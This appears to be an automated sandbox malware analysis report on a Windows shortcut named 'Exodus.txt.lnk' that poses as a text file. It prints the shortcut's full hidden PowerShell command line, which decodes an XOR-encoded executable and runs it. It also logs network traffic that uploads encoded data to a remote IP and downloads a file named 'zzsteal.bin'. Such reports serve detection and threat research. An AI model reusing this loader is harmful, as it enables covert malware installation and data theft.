URL: file:///C:/Users/user/AppData/Local/Temp/p.html Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/AppData/Local/Temp/p.html Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/AppData/Local/Temp/p.html Model: Joe Sandbox AI	{ "brands": [ "Claro", "Google", "Turboboy", "Miclaro", "DirecTV" ] }

URL: file:///C:/Users/user/AppData/Local/Temp/p.html Model: Joe Sandbox AI	{ "brands": [ "Claro", "Google", "Turboboy", "Miclaro", "DirecTV" ] }

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllultnxj:NllU
MD5:	F93358E626551B46E6ED5A0A9D29BD51
SHA1:	9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
SHA-256:	0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
SHA-512:	D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
Malicious:	false
Preview:	@...e................................................@..........

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Jan 11 06:41:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.974571565891521
Encrypted:	false
SSDEEP:	48:8Jd1TdtpHuidAKZdA19ehwiZUklqeh2y+3:85DeBy
MD5:	C4A7F5A9E7D7393727E5D6DB6ABBA2F1
SHA1:	2737430A90641D94E38457E07246FCA539572774
SHA-256:	53F3F6CA1D4F99DC5059636811B2C5542F9913CE433441B4ED0B0F35A1E7F478
SHA-512:	33D262E11E52F614588D5BA2328C8CA0EEA3A63AB340C99AB6BB33264031E25A3D6468318787CA4CFF7DE670A371321D0BE2B8FB2B13639F0CB11F04DB398057
Malicious:	false
Preview:	L..................F.@.. ...$+.,.......F.c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I+Z8=....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V+Z8=....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V+Z8=....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V+Z8=..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V+Z:=...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............S.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
Entropy (8bit):	6.22025891366915
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	Exodus.txt.lnk
File size:	74'022 bytes
MD5:	dbf4819fd016c532db4313b9748ed879
SHA1:	a5f3818adc3eb97b658f62c1144cbd2add8d5528
SHA256:	2932dfc97050720a10f6b41f2c765d6200c64ed418a7058126965e827953323d
SHA512:	a5e5fb0a1d3280ec98b651e5a3649bd7178a4851806a379abc914632b87c9a92a3eabf79bf91d04a4803de817063e93fff0b91a7d7951c383fee0f32c6898387
SSDEEP:	1536:rRJzAcf/xgpDWDpMrGKrV4Af/NioMx6r/Shb5hbYj9gPzAe7uETdJbFV91a:rEcfW1WD4GiGAf/0HbYpgluQTJV91a
TLSH:	F3736C91B96D3A51DB6E843371B453F4B43F9226027AAAB5203C73539353E6B9D00B3E
File Content Preview:	L..................F........................................................A.T.y.p.e.:. .T.e.x.t. .D.o.c.u.m.e.n.t...S.i.z.e.:. .5...2.3. .K.B...D.a.t.e. .m.o.d.i.f.i.e.d.:. .0.1./.0.2./.2.0.2.0. .1.1.:.2.3.z. . . . . . . . . . . . . . . . . . . . . . .

General
Relative Path:
Command Line Argument:	/c powershell -windowstyle hidden $lnkpath = Get-ChildItem *.lnk ^\| where-object {$_.length -eq 0x00012126} ^\| Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = '%temp%\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file ^\| select -Skip 002838)) -Encoding Byte; ^& $path;
Icon location:	%windir%\system32\notepad.exe

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 08:41:49.085433960 CET	53	58057	1.1.1.1	192.168.2.5
Jan 11, 2025 08:41:49.226284027 CET	53	53998	1.1.1.1	192.168.2.5
Jan 11, 2025 08:41:50.653440952 CET	53	60621	1.1.1.1	192.168.2.5
Jan 11, 2025 08:41:52.786456108 CET	63837	53	192.168.2.5	1.1.1.1
Jan 11, 2025 08:41:52.794106960 CET	53	63837	1.1.1.1	192.168.2.5
Jan 11, 2025 08:41:52.818430901 CET	61793	53	192.168.2.5	1.1.1.1
Jan 11, 2025 08:41:52.825342894 CET	53	61793	1.1.1.1	192.168.2.5
Jan 11, 2025 08:41:53.279361010 CET	64822	53	192.168.2.5	1.1.1.1
Jan 11, 2025 08:41:53.279489994 CET	59578	53	192.168.2.5	1.1.1.1
Jan 11, 2025 08:41:53.286088943 CET	53	64822	1.1.1.1	192.168.2.5
Jan 11, 2025 08:41:53.286540985 CET	53	59578	1.1.1.1	192.168.2.5
Jan 11, 2025 08:41:53.388488054 CET	61508	53	192.168.2.5	1.1.1.1
Jan 11, 2025 08:41:53.395541906 CET	53	61508	1.1.1.1	192.168.2.5
Jan 11, 2025 08:42:01.499649048 CET	58352	53	192.168.2.5	1.1.1.1
Jan 11, 2025 08:42:01.506675959 CET	53	58352	1.1.1.1	192.168.2.5
Jan 11, 2025 08:42:07.771081924 CET	53	57897	1.1.1.1	192.168.2.5
Jan 11, 2025 08:42:22.832190037 CET	55880	53	192.168.2.5	1.1.1.1
Jan 11, 2025 08:42:22.839024067 CET	53	55880	1.1.1.1	192.168.2.5
Jan 11, 2025 08:42:25.308253050 CET	53	59895	162.159.36.2	192.168.2.5
Jan 11, 2025 08:42:25.824970961 CET	53	64561	1.1.1.1	192.168.2.5
Jan 11, 2025 08:42:26.651856899 CET	53	63155	1.1.1.1	192.168.2.5
Jan 11, 2025 08:42:41.774322987 CET	59481	53	192.168.2.5	1.1.1.1
Jan 11, 2025 08:42:42.309350967 CET	53	59481	1.1.1.1	192.168.2.5
Jan 11, 2025 08:42:48.590811014 CET	53	51663	1.1.1.1	192.168.2.5
Jan 11, 2025 08:42:49.659827948 CET	53	60064	1.1.1.1	192.168.2.5
Jan 11, 2025 08:42:49.719569921 CET	53	52094	1.1.1.1	192.168.2.5
Jan 11, 2025 08:43:19.825090885 CET	53	58793	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:41:44.585546017 CET	678	OUT	POST /XtfcshEgt/upwawsfrg.php HTTP/1.1 Cookie: SESSION=Gcj+h98EbIpiEEEi3hoB0+vAL9nowD1t+Mk69sQz+82rTgB01+DlIetdQvoEbO+iMyqLYrt29vtIjLtyKN2duhsKwFI97DwnfBfo13W20KSQ9caE0kAuGXwreH771RqNHNmbRM0y60QLnmT9pMrp3c0FhSBQRDuNV3sGdF7mdCxarHDX8BCOX4OjVygMl1phDoC6SPlB/+sIqxLAaVDdnWVGAUGjhjZlTg3mPga+hlrXa27ZLNjP8Eifjk6AL3+28IVLfb5VXklN9NHBv5JehJAwTnVk9afSwGZfw29QgAjx82lWT7LbojoheSYe89Xc6F6nQyzWVdp8Qxn1XqPLROP8cDqCQMmfH9Eij5vei8oZIt8PoXrHiXoe Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0 Host: 128.199.113.162 Content-Length: 120671 Expect: 100-continue Connection: Keep-Alive
Jan 11, 2025 08:41:44.945995092 CET	12360	OUT	Data Raw: 4e 61 6d 65 3d 4d 50 47 76 6d 5a 70 49 26 64 61 74 61 46 69 6c 65 3d 76 45 6f 69 48 50 38 32 55 37 6c 43 4d 6d 4d 5a 25 32 66 53 4a 46 69 74 69 53 61 70 30 6b 4b 77 77 4d 31 4f 4e 52 6b 61 42 55 6d 71 48 65 61 7a 31 66 6d 36 76 56 61 38 74 71 44 Data Ascii: Name=MPGvmZpI&dataFile=vEoiHP82U7lCMmMZ%2fSJFitiSap0kKwwM1ONRkaBUmqHeaz1fm6vVa8tqDLM1VcGKEGGlPJhLxMQn48IgQpLX%2fxscwS9NomRgIwX1wSzjrOvAppv4jwN4D3T2kkyM4COyN%2fmyB4Zpgy5K1heytML5uJZZ030VBSmOVWlkNAP0bihcvgCMtgueQZPyFW9wxAU2HoiqM6UHqLUSywnSGA1QOE
Jan 11, 2025 08:41:44.951306105 CET	2472	OUT	Data Raw: 48 48 51 55 75 79 45 4c 51 6e 33 31 32 34 66 50 64 37 6a 4a 6b 61 71 73 55 52 69 59 7a 72 6c 59 74 68 48 61 4f 62 7a 44 70 4c 64 41 63 65 67 6c 51 42 68 49 59 6d 53 36 66 56 65 49 25 32 62 41 6d 6d 79 5a 5a 4f 62 63 64 71 32 37 6d 6d 70 52 50 55 Data Ascii: HHQUuyELQn3124fPd7jJkaqsURiYzrlYthHaObzDpLdAceglQBhIYmS6fVeI%2bAmmyZZObcdq27mmpRPU%2bHK7eOAcJXCCv93mP8s6nrcjhxe1W1Vl4go0MndDMmQacyhGAn1Ez4wyTW1eYKSTDbfVxF9Cf4PK9Enw4gkDSaqlldi5uUKkO542NUzkZolPgBZQnbFW%2fMIQO0Ll1zbAXv1eMxuXDOr8crEoxhivxavsQy2EE
Jan 11, 2025 08:41:44.951343060 CET	2472	OUT	Data Raw: 36 30 47 63 4e 48 62 6c 64 63 32 69 59 59 48 55 71 4d 44 30 39 61 68 53 34 44 52 53 36 41 6d 4f 67 4a 31 59 54 72 42 36 54 25 32 62 72 71 38 6a 25 32 62 48 41 62 59 43 56 47 6b 4c 71 69 52 51 39 35 51 6e 59 25 32 66 75 4e 33 25 32 66 77 34 35 36 Data Ascii: 60GcNHbldc2iYYHUqMD09ahS4DRS6AmOgJ1YTrB6T%2brq8j%2bHAbYCVGkLqiRQ95QnY%2fuN3%2fw456lbz17ql6gKFvDhKW6ozuX3Xy9NQVNcc5P1FkOrRVmruuNSTpQJIx1J3KgYxn%2bqmL%2fpK7vfnxbpu5PmyhUFekztOnbOGtXOdoVP6Wx4AMDr0vz2fyQePA1rrMKrjOwiTR2ly5QvXwZFmgBknVvg2u%2bZL9I9K
Jan 11, 2025 08:41:44.951363087 CET	2472	OUT	Data Raw: 77 4f 45 56 6b 69 55 58 6a 39 50 6d 30 79 63 61 66 65 39 48 30 39 67 56 56 71 25 32 62 38 6f 70 25 32 66 73 50 35 6e 4d 61 37 30 34 52 33 4f 53 79 61 65 77 66 6b 78 48 6d 61 4a 65 77 37 6b 41 25 32 66 39 41 62 76 38 6e 6e 36 33 41 30 4d 49 6d 37 Data Ascii: wOEVkiUXj9Pm0ycafe9H09gVVq%2b8op%2fsP5nMa704R3OSyaewfkxHmaJew7kA%2f9Abv8nn63A0MIm7s9ZQJHMRnDKjK2JuEr3%2b9OrQZjQnXkHTbCR2SJ9meSac6OpMzXB6XRM601QiaytvfXoxIfz4THMZFL6gJzSB2UccGYgBDHQeTW5lwerM4SLDyCJ%2fYNg10d2VRSaaAtCyopMf5jxpfbBLBL6CziJ%2f0VhpxHt
Jan 11, 2025 08:41:44.951436043 CET	4944	OUT	Data Raw: 72 62 4b 74 49 31 6b 63 31 70 52 6a 44 4b 74 6f 4b 7a 65 59 74 64 78 6c 52 75 38 25 32 62 63 34 68 50 6c 31 59 38 6f 77 46 6a 52 73 57 34 6b 64 42 32 6d 6d 57 44 43 66 6a 77 32 44 6e 64 4a 70 64 67 63 75 54 36 62 75 55 61 53 69 39 35 55 31 72 68 Data Ascii: rbKtI1kc1pRjDKtoKzeYtdxlRu8%2bc4hPl1Y8owFjRsW4kdB2mmWDCfjw2DndJpdgcuT6buUaSi95U1rhXnktHtPGkeIQ5HCjEJABEQdu9bQ0EDrRGo6zJBbp1wws00jWEZYAJyJptp%2bJH%2fjAypxA6RUMsDRkYW1VAwrCG7aohXllDLT6Jr26CLw45wHTTiciMj5Rr197BHT78PUA30i5BMB4JJtUdoHAgQAahm4ykjW4B
Jan 11, 2025 08:41:44.951503038 CET	4944	OUT	Data Raw: 25 32 66 64 4c 57 65 79 25 32 66 72 35 56 31 25 32 66 47 62 72 39 77 48 47 54 6b 74 54 36 71 69 33 4e 79 78 36 5a 65 5a 54 41 6c 66 74 25 32 66 6e 74 4b 57 67 52 7a 45 6b 38 6e 49 76 34 48 6c 69 6c 7a 73 38 43 5a 4a 6b 74 69 33 6f 68 6a 47 35 71 Data Ascii: %2fdLWey%2fr5V1%2fGbr9wHGTktT6qi3Nyx6ZeZTAlft%2fntKWgRzEk8nIv4Hlilzs8CZJkti3ohjG5q5gVZSYOFMWwdo4v1q%2bUUsdG6A2pxmpxSWC2EbvU0qJ1%2fR5xQVN71z1SCt58dzHCdVbIKsMW3OQyfMKyfkk%2b9490rsA3KjCUmAZ0Oj7hsZQlmuQ7nTAnxFhjAe0JQIoyn9ezsp0ZtlacFiEeJfUdrx7BKlbo
Jan 11, 2025 08:41:44.951549053 CET	4944	OUT	Data Raw: 4d 6d 7a 53 59 31 25 32 62 64 6a 74 6b 49 33 65 61 25 32 62 4c 47 69 43 74 72 37 35 4e 68 46 71 46 61 6f 47 32 6e 6e 39 55 53 30 43 69 49 4f 71 34 66 4d 32 7a 52 4f 34 34 52 58 79 78 38 59 43 7a 4e 67 44 56 47 4c 35 49 6c 45 57 42 37 6a 71 6f 72 Data Ascii: MmzSY1%2bdjtkI3ea%2bLGiCtr75NhFqFaoG2nn9US0CiIOq4fM2zRO44RXyx8YCzNgDVGL5IlEWB7jqork4dsj2oYsPw24dWn7ySW5U%2fyZIanD6nJQdCkW3uOQ673W6keb9pY3IIZrekEwe0ok%2fzMQucKHoqizGTcMmMsIPeGH3PbkbbNSFSEDkv28PFjQHRzyjsK%2fh%2bWjWLMRHIV82ID8vDJWnKauE%2fJZi0JX0S
Jan 11, 2025 08:41:44.951644897 CET	2472	OUT	Data Raw: 51 4e 4e 6f 65 72 62 44 59 37 30 46 4f 34 63 54 75 65 54 66 74 46 73 33 76 58 42 36 47 4a 64 67 42 68 6c 62 25 32 66 54 4e 5a 50 25 32 66 53 30 71 4d 77 4c 45 32 4b 44 51 78 68 4c 38 47 63 6e 30 6e 6b 51 53 4e 77 6a 42 74 63 42 4c 65 78 54 43 42 Data Ascii: QNNoerbDY70FO4cTueTftFs3vXB6GJdgBhlb%2fTNZP%2fS0qMwLE2KDQxhL8Gcn0nkQSNwjBtcBLexTCBngRlXy89X8cZiSTL9m0bjV5xgW94pmogiXjo8lWOjEwXw5R4v0CgpkDhZFButEo0SM1KannVafgm0lWcZHNwADHaDqPsxgGw7rWR7f5cUzSNKbxGLVj5%2blNh3mAXn3R74hMMU0ABOISrEB%2fvdur2Jk0tsCapF
Jan 11, 2025 08:41:44.956533909 CET	4944	OUT	Data Raw: 4d 35 42 58 31 32 76 7a 4a 6f 66 54 61 47 62 4e 64 79 42 4a 74 70 4f 25 32 66 45 54 52 36 64 50 33 48 39 46 38 6c 25 32 62 4f 56 67 63 45 33 37 33 6f 63 37 56 4a 75 33 6c 42 7a 6e 65 50 34 41 56 51 36 72 35 66 69 61 58 25 32 62 34 39 51 46 77 31 Data Ascii: M5BX12vzJofTaGbNdyBJtpO%2fETR6dP3H9F8l%2bOVgcE373oc7VJu3lBzneP4AVQ6r5fiaX%2b49QFw18qn3uhh9ra9L4e1ckj4UJ9AFf72F0%2baHc0Rc%2bLyUbeUNpR9kwBaSP9Vv8LbUNJK0sGtuQd1JOMizeXZUJE4dSBymHCJMZngGxhXKYqpeUJJxb17aaAxW%2fVatdpBsxm6Iy6sOpFCMcIBugJ2OzvQx8KFECUW
Jan 11, 2025 08:41:44.956757069 CET	4944	OUT	Data Raw: 39 55 76 4a 43 4e 75 55 7a 6f 59 66 36 6a 55 64 4a 6f 51 52 6d 72 42 75 38 51 4a 49 49 43 77 61 76 6f 4f 52 6d 38 51 39 77 57 75 34 74 34 36 75 46 6a 6c 45 6b 25 32 66 25 32 62 49 33 4f 62 69 61 49 5a 58 6c 74 33 62 25 32 66 67 58 69 70 74 42 62 Data Ascii: 9UvJCNuUzoYf6jUdJoQRmrBu8QJIICwavoORm8Q9wWu4t46uFjlEk%2f%2bI3ObiaIZXlt3b%2fgXiptBbhHc1WjOSMF6jPx2NfDZ8KcmByzV04ChsHai2q3H84Gpa%2f5ivfCb24Rj5t5Jd4fAGP8FDZ6tzZlaywfEgwuybUOTbkawoEDkntMTs7DklDSxIO4ivEtigKdhtwqMT%2b%2bgMrOAgrWrdrhqxdXHt9wnlg3gSmEi
Jan 11, 2025 08:41:45.476236105 CET	25	IN	HTTP/1.1 100 Continue
Jan 11, 2025 08:41:46.394768000 CET	207	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:41:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 38 3d 3d 33 Data Ascii: 8==3
Jan 11, 2025 08:41:48.179501057 CET	563	OUT	GET /XtfcshEgt/upwawsfrg.php?zd=1 HTTP/1.1 Cookie: SESSION=Gcj+h98EbIpiEEEi3hoB0+vAL9nowD1t+Mk69sQz+82rTgB01+DlIetdQvoEbO+iMyqLYrt29vtIjLtyKN2duhsKwFI97DwnfBfo13W20KSQ9caE0kAuGXwreH771RqNHNmbRM0y60QLnmT9pMrp3c0FhSBQRDuNV3sGdF7mdCxarHDX8BCOX4OjVygMl1phDoC6SPlB/+sIqxLAaVDdnWVGAUGjhjZlTg3mPga+hlrXa27ZLNjP8Eifjk6AL3+28IVLfb5VXklN9NHBv5JehJAwTnVk9afSwGZfw29QgAjx82lWT7LbojoheSYe89Xc6F6nQyzWVdp8Qxn1XqPLROP8cDqCQMmfH9Eij5vei8oZIt8PoXrHiXoe User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0 Host: 128.199.113.162
Jan 11, 2025 08:41:48.714813948 CET	365	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:41:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Description: File Transfer Content-Disposition: attachment; filename=zzsteal.bin Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Pragma: public Content-Length: 329728 Content-Type: application/octet-stream

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:41:52.832747936 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Jan 11, 2025 08:41:53.283683062 CET	535	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:41:53 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=sKODi1Arhq0GUGirzpFeP6dAUxVfNihR0K.iuzIQj_4-1736581313-1.0.1.1-MenvoTVxRHeXwGo8fpyQOEwp6YZ6NHR0klRt7Udy.tqR6KkBnIUqQW4KknMY83tU4zfBz.3huiIJ2xY54LGbuQ; path=/; expires=Sat, 11-Jan-25 08:11:53 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 90034457b960729e-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a Data Ascii: 8.46.123.189

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:42:04.017558098 CET	678	OUT	POST /XtfcshEgt/upwawsfrg.php HTTP/1.1 Cookie: SESSION=Gcj+h98EbIpiEEEi3hoB0+vAL9nowD1t+Mk69sQz+82rTgB01+DlIetdQvoEbO+iMyqLYrt29vtIjLtyKN2duhsKwFI97DwnfBfo13W20KSQ9caE0kAuGXwreH771RqNHNmbRM0y60QLnmT9pMrp3c0FhSBQRDuNV3sGdF7mdCxarHDX8BCOX4OjVygMl1phDoC6SPlB/+sIqxLAaVDdnWVGAUGjhjZlTg3mPga+hlrXa27ZLNjP8Eifjk6AL3+28IVLfb5VXklN9NHBv5JehJAwTnVk9afSwGZfw29QgAjx82lWT7LbojoheSYe89Xc6F6nQyzWVdp8Qxn1XqPLROP8cDqCQMmfH9Eij5vei8oZIt8PoXrHiXoe Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0 Host: 128.199.113.162 Content-Length: 213199 Expect: 100-continue Connection: Keep-Alive
Jan 11, 2025 08:42:04.363389015 CET	12360	OUT	Data Raw: 4e 61 6d 65 3d 4d 50 47 76 6d 5a 70 49 26 64 61 74 61 46 69 6c 65 3d 76 45 6f 69 48 50 38 32 55 37 6c 43 4d 6d 4d 5a 25 32 66 53 4a 46 69 74 69 53 61 70 30 6b 4b 77 77 4d 31 4f 4e 52 6b 61 42 55 6d 71 48 65 61 7a 31 66 6d 36 76 56 61 38 74 71 44 Data Ascii: Name=MPGvmZpI&dataFile=vEoiHP82U7lCMmMZ%2fSJFitiSap0kKwwM1ONRkaBUmqHeaz1fm6vVa8tqDLM1VcGKEGGlPJhLxMQn48IgQpLX%2fxscwS9NomRgIwX1wSzjrOvAppv4jwN4D3T2kkyM4COyN%2fmyB4Zpgy5K1heytML5uJZZ030VBSmOVWlkNAP0bihcvgCMtgueQZPyFW9wxAU2HoiqM6UHqLUSywnSGA1QOE
Jan 11, 2025 08:42:04.368473053 CET	2472	OUT	Data Raw: 56 54 72 7a 5a 49 6a 74 44 78 63 25 32 66 61 77 4a 62 37 37 4e 7a 70 6d 6f 4e 56 6b 35 6c 62 4a 4b 41 38 75 61 44 56 74 4d 76 72 57 6c 48 6c 55 51 33 73 4f 7a 31 48 41 63 66 39 33 35 74 41 25 32 62 63 6a 69 7a 39 64 78 4f 49 48 31 41 45 66 64 65 Data Ascii: VTrzZIjtDxc%2fawJb77NzpmoNVk5lbJKA8uaDVtMvrWlHlUQ3sOz1HAcf935tA%2bcjiz9dxOIH1AEfdeu3edzg%2byl6LPtGvIAPdPmzXb1NWDH%2fWTitjq1yo9pCYi4LLmO3bIQfL0%2bNqzZflz0n2R%2ff0GXbQ3Uqy0YX6L9un1u7BEIgM2hZqDQK5P%2f9jiN%2bsTXqU%2fMVxdqPT7SucMKkd%2bMIH%2bYwsA%2f
Jan 11, 2025 08:42:04.368510962 CET	2472	OUT	Data Raw: 44 70 68 6f 71 32 44 47 73 48 32 57 7a 61 33 76 32 66 71 36 4b 33 47 43 4a 44 57 4c 41 6d 64 75 33 34 46 68 53 65 76 32 4f 5a 64 71 55 51 79 73 37 32 4f 6f 77 50 54 45 25 32 66 56 6f 55 46 57 66 51 69 62 63 4d 37 51 73 54 25 32 62 6c 41 67 78 31 Data Ascii: Dphoq2DGsH2Wza3v2fq6K3GCJDWLAmdu34FhSev2OZdqUQys72OowPTE%2fVoUFWfQibcM7QsT%2blAgx189rac2yOI%2btGHNGRLe1258vJ662YZHJIqfq01qqFQXUPN9fZnCFbU05wCi4thDeC3rao%2fKdQJ9sBymBKyogOrNVNRL%2f0vYEbihkTV4uRiC4U2FqOnFtUTAS6ge7Z4iSSG2cXw5e%2fJIugxqovLxTcyCBiT
Jan 11, 2025 08:42:04.368556976 CET	2472	OUT	Data Raw: 6b 77 43 6b 37 4a 47 54 52 34 4c 6e 45 52 50 44 63 43 63 32 45 6d 54 61 50 52 63 61 77 55 6d 35 38 64 41 68 36 59 73 61 64 4b 33 43 44 50 63 65 66 64 7a 64 72 5a 73 5a 64 31 5a 7a 79 5a 55 66 47 5a 6a 6a 70 6b 65 38 7a 45 37 79 6b 25 32 62 6e 79 Data Ascii: kwCk7JGTR4LnERPDcCc2EmTaPRcawUm58dAh6YsadK3CDPcefdzdrZsZd1ZzyZUfGZjjpke8zE7yk%2bny1qla8qXB%2fMymtSitv3kXMwb6WMzEbD7myEL8gpLZCLEh%2bq31g76A0RZ9%2fiol7Cm6pYPUpRuyV8Ndp%2bFcJDu2qyJlTrVbFTsKXrTagIBoUrSsXWcMzg2AaP0WZZPMxn5aaT2X0lLJ2w2IXkaORloUqrSsv
Jan 11, 2025 08:42:04.368590117 CET	7416	OUT	Data Raw: 4c 34 44 4f 4b 4d 52 5a 7a 79 4c 39 4c 72 65 50 66 56 59 36 54 6b 4f 7a 25 32 62 48 72 47 57 76 6c 57 6d 72 25 32 66 78 67 5a 69 34 47 7a 6a 61 59 30 52 56 75 36 56 63 55 43 33 45 6e 55 6f 4d 55 45 4a 4c 72 51 6f 42 39 4f 57 75 37 77 43 48 56 25 Data Ascii: L4DOKMRZzyL9LrePfVY6TkOz%2bHrGWvlWmr%2fxgZi4GzjaY0RVu6VcUC3EnUoMUEJLrQoB9OWu7wCHV%2bBV%2feGynBhUsKpZ4dBwZCPoQatA%2fj%2f2YCsbeWdm97e6%2bc0QJ4CuueYrPak0hY3H1B5k%2bIOGUDZKOTh%2fGulVmECxjM9LxFTAyg%2btpGku%2b5fukuztonFtTiUpkEBHTmQbDC3B102REG3JETBGI
Jan 11, 2025 08:42:04.368690968 CET	4944	OUT	Data Raw: 35 31 64 71 53 4c 25 32 66 43 31 4a 55 51 74 5a 59 52 73 4a 4c 62 4a 4c 76 69 43 6a 47 6b 42 45 44 70 79 65 5a 65 48 6e 75 57 58 42 4d 4b 32 6e 64 4a 73 74 30 4d 76 70 35 42 54 76 33 4d 65 42 78 77 61 6c 72 70 7a 68 4a 74 54 4c 70 56 4b 4d 34 38 Data Ascii: 51dqSL%2fC1JUQtZYRsJLbJLviCjGkBEDpyeZeHnuWXBMK2ndJst0Mvp5BTv3MeBxwalrpzhJtTLpVKM48k8%2bvKMF4pWTh3AbsfHJB9xtxSvyn3cdbDF7%2ftUTVO%2b3MuY%2bezUZl7%2bHtCHDhuFCLXzlDCCgWKFivQsa7ZCJ53Y8RHI5kvUEI3G1P4XYZULWfIBGsLCVMZQ9fdH2quTo8IW5XVoLiGkf9GERvoz5MKCx
Jan 11, 2025 08:42:04.368721008 CET	4944	OUT	Data Raw: 4c 4c 36 76 4c 66 77 25 32 66 61 53 75 53 58 4d 49 6e 77 4b 78 73 31 54 75 25 32 62 36 56 6d 69 6f 59 46 46 48 50 31 62 69 74 45 59 70 4d 41 78 78 44 44 4c 34 64 79 4b 6d 63 6c 6d 56 75 57 39 52 30 51 67 32 4b 41 4f 30 45 68 49 6f 49 73 32 4c 4e Data Ascii: LL6vLfw%2faSuSXMInwKxs1Tu%2b6VmioYFFHP1bitEYpMAxxDDL4dyKmclmVuW9R0Qg2KAO0EhIoIs2LNqd8KSBzGU5sDxjhabyJQDMbXyInBGSLE5Lg7bJr1NfyQmwS7GaI4BsIQaXlQRnV5WcPe4KExDU%2bO1aswVYTFK%2fO4B%2fAmD%2fHHf47j%2bLxD9kFpxUnR%2bqOnovF3FyQuZB8ynlgFtCCn10udmsJZSUbOp
Jan 11, 2025 08:42:04.376085043 CET	4944	OUT	Data Raw: 4d 47 57 45 75 42 62 57 34 41 46 44 51 6d 52 39 4a 62 39 57 68 51 77 67 56 61 48 4b 55 38 73 6d 38 47 70 37 62 71 6b 32 64 62 69 59 47 25 32 66 63 59 36 4c 75 57 48 51 6f 45 32 6e 4a 43 6b 4c 30 25 32 62 44 5a 61 48 34 7a 72 49 69 69 57 59 32 36 Data Ascii: MGWEuBbW4AFDQmR9Jb9WhQwgVaHKU8sm8Gp7bqk2dbiYG%2fcY6LuWHQoE2nJCkL0%2bDZaH4zrIiiWY26C3J6PvaU%2b%2fgjxhFjQP4WO7a0IGGdniDGGNdAmj4FkgOZjl5Vzaj1GljMJbUHn7hQFU1%2bpdVtOb%2fPa0cpQTUCAfhxVczGh4WpupJUG2XaL%2fuGLqKIYJh33lLYW8dvduTs96ZsXPuGDbtSv2QxbmM0Vyg
